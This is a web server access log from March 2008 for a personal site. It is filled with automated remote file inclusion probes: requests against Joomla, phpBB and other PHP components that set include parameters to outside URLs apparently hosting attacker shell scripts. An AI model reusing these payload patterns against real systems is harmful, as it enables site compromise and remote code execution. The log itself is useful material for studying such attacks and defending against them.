69.93.148.36 - - [02/Mar/2008:06:16:11 -0800] "GET //index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
69.93.148.36 - - [02/Mar/2008:06:16:11 -0800] "GET /logs//index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:06:17:08 -0800] "GET /logs/access_080131.log/index.php?body=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:06:17:08 -0800] "GET /logs/access_080131.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:06:18:13 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:06:18:13 -0800] "GET /logs/access.log/components/com_zoom/includes/database.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
60.249.45.142 - - [02/Mar/2008:06:18:56 -0800] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [02/Mar/2008:06:18:57 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.42.221 - - [02/Mar/2008:06:18:58 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.60.191 - - [02/Mar/2008:06:19:07 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [02/Mar/2008:06:19:55 -0800] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [02/Mar/2008:06:19:56 -0800] "GET /logs//?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 200 36979 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.48.95 - - [02/Mar/2008:06:20:03 -0800] "GET /logs/contrib/phpBB2/modules.php?phpbb_root_path=http://www.geocities.com/tomohonhack1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
221.143.48.95 - - [02/Mar/2008:06:20:04 -0800] "GET /contrib/phpBB2/modules.php?phpbb_root_path=http://www.geocities.com/tomohonhack1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:06:20:05 -0800] "GET /logs/access_080119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:06:20:06 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:06:20:06 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:06:20:18 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
66.249.73.115 - - [02/Mar/2008:06:20:23 -0800] "GET /bikes/dteel/2008_02_16/Arryo_Seco/ HTTP/1.1" 200 8443 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:20:28 -0800] "GET /logs/access.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:20:55 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.175.3 - - [02/Mar/2008:06:21:24 -0800] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [02/Mar/2008:06:21:29 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.233.7.68 - - [02/Mar/2008:06:21:29 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.23.200 - - [02/Mar/2008:06:21:51 -0800] "GET /bikes/dteel/2008_02_07/?N=D HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.60.191 - - [02/Mar/2008:06:22:16 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [02/Mar/2008:06:22:22 -0800] "GET /logs/access_080131.log//?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.127.223.39 - - [02/Mar/2008:06:22:31 -0800] "GET /logs/access_080131.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:22:43 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:22:47 -0800] "GET /index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.101.125 - - [02/Mar/2008:06:22:54 -0800] "GET /logs/access_080215.log/mcf.php?content=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:23:00 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.101.125 - - [02/Mar/2008:06:23:02 -0800] "GET /logs/mcf.php?content=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:23:42 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:23:51 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.101.125 - - [02/Mar/2008:06:24:00 -0800] "GET /logs/access_080208.log/mcf.php?content=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.21.88 - - [02/Mar/2008:06:24:00 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.21.88 - - [02/Mar/2008:06:24:00 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:24:11 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:06:24:28 -0800] "GET /index.php?incl=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.191.16.14 - - [02/Mar/2008:06:25:04 -0800] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:25:36 -0800] "GET /logs/access_080215.log/mcf.php?content=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:25:37 -0800] "GET /logs/access_080215.log/mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:25:37 -0800] "GET /logs/mcf.php?content=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:25:37 -0800] "GET /logs/mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:06:26:08 -0800] "GET /logs/access_080131.log/index2.php?p=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:06:26:08 -0800] "GET /logs/index2.php?p=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:06:26:33 -0800] "GET /logs/access_080201.log/claroline/tracking/userLog.php?rootSys=http://www.grupslactancia.info/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:06:26:34 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.grupslactancia.info/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:27:00 -0800] "GET /logs/access_080208.log/mcf.php?content=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:27:00 -0800] "GET /logs/access_080208.log/mcf.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:27:23 -0800] "GET /logs/access_080127.log/index1.php?pag=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.191.16.11 - - [02/Mar/2008:06:27:25 -0800] "GET /logs/access_080131.log//index.php?pag=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.11 - - [02/Mar/2008:06:27:25 -0800] "GET //index.php?pag=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.11 - - [02/Mar/2008:06:27:25 -0800] "GET /logs//index.php?pag=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:27:29 -0800] "GET /index1.php?pag=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:27:40 -0800] "GET /logs/index1.php?pag=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [02/Mar/2008:06:27:41 -0800] "GET /logs/access_080131.log/index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.57.207 - - [02/Mar/2008:06:28:16 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.102.153 - - [02/Mar/2008:06:28:21 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
87.118.102.153 - - [02/Mar/2008:06:28:22 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:06:28:44 -0800] "GET /index2.php?x=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.148.27 - - [02/Mar/2008:06:29:07 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:06:29:28 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qlzr.net/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.92.222.169 - - [02/Mar/2008:06:30:24 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
81.92.222.169 - - [02/Mar/2008:06:30:24 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:06:30:28 -0800] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:06:30:29 -0800] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:06:30:29 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:06:30:29 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.33.49.76 - - [02/Mar/2008:06:31:17 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.33.49.76 - - [02/Mar/2008:06:31:17 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.33.49.76 - - [02/Mar/2008:06:31:17 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.33.49.76 - - [02/Mar/2008:06:31:17 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.33.49.76 - - [02/Mar/2008:06:31:18 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.33.49.76 - - [02/Mar/2008:06:31:18 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.8.154.215 - - [02/Mar/2008:06:32:44 -0800] "GET /logs/access_080131.log/index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [02/Mar/2008:06:32:44 -0800] "GET /index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [02/Mar/2008:06:32:45 -0800] "GET /logs/index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:32:58 -0800] "GET /send_reminders.php?includedir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:32:58 -0800] "GET /send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.21.88 - - [02/Mar/2008:06:33:50 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.21.88 - - [02/Mar/2008:06:33:51 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.182.101.125 - - [02/Mar/2008:06:34:53 -0800] "GET /send_reminders.php?includedir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:06:35:14 -0800] "GET /index1.php?choix=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.160.88 - - [02/Mar/2008:06:35:42 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.19.219 - - [02/Mar/2008:06:36:05 -0800] "GET /bikes/dteel/WeSTOC07/?D=A HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:06:36:13 -0800] "GET /logs/access_080121.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:06:36:14 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:06:36:14 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:06:36:32 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:06:36:48 -0800] "GET /logs/access_080207.log/index1.php?choix=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:06:36:48 -0800] "GET /logs/index1.php?choix=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:36:53 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:06:36:53 -0800] "GET /logs/access_080128.log/index1.php?choix=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:36:59 -0800] "GET /index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:37:03 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:37:06 -0800] "GET /index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:37:10 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:06:38:28 -0800] "GET /logs/access_080221.log/index.php?incl=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:06:38:29 -0800] "GET /logs/index.php?incl=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.16 - - [02/Mar/2008:06:38:34 -0800] "GET /index.php3?act=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:38:35 -0800] "GET /index1.php?choix=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:38:35 -0800] "GET /index1.php?choix=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:38:52 -0800] "GET /logs/access.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:06:39:12 -0800] "GET /logs/access_080105.log/index.php?incl=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:06:39:20 -0800] "GET /logs/access_080117.log/index2.php?x=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:06:39:20 -0800] "GET /logs/index2.php?x=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.8.154.215 - - [02/Mar/2008:06:39:52 -0800] "GET /logs/access_080117.log/index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.16 - - [02/Mar/2008:06:40:54 -0800] "GET /logs/access_080211.log/index.php3?act=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [02/Mar/2008:06:40:55 -0800] "GET /logs/index.php3?act=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:06:40:58 -0800] "GET /index.php?pag=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:06:41:03 -0800] "GET /index.php?pag=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:41:41 -0800] "GET /logs/access_080207.log/index1.php?choix=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:41:42 -0800] "GET /logs/access_080207.log/index1.php?choix=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:41:42 -0800] "GET /logs/index1.php?choix=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:41:42 -0800] "GET /logs/index1.php?choix=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:41:49 -0800] "GET /logs/access_071230.log/index1.php?choix=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:41:49 -0800] "GET /logs/access_071230.log/index1.php?choix=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
